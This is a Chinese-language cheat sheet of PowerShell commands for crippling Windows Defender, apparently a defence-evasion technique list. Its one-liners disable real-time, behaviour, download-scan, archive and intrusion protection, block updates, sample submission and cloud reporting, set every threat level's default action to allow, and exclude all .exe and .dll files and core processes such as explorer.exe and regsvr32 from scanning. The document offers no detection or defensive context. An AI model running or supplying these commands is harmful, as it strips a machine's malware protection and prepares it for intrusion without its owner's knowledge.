Windows Defender功能削弱
# 关闭实时保护
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" # 关闭行为监视 powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" # 禁用IOAV保护,禁止扫描下载的文件和附件 powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true" # 关闭Defender自动更新 powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true" # 禁止扫描.zip等的存档文件 powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true" # 关闭已知漏洞利用防护 powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
Defender威胁忽视
# 禁止提交样本
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
# 指定用于高级威胁的自动修复操作选项
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
# 指定用于中级威胁的自动修复操作选项
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
# 指定用于低级威胁的自动修复操作选项
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
# 指定用于严重威胁的自动修复操作选项
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
Defender检测扩展排除
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
Defender检测进程排除
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32*""
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
powershell.exe -command "Add-MpPreference -ExclusionProcess "*.dll""
powershell.exe -command "Add-MpPreference -ExclusionProcess "*.exe""
禁止向微软报告安全信息
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
保护关闭
# PUA保护关闭
powershell.exe -command "Set-MpPreference -PUAProtection disable"
攻击面减少
# 关闭受控文件夹访问
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
参考资料: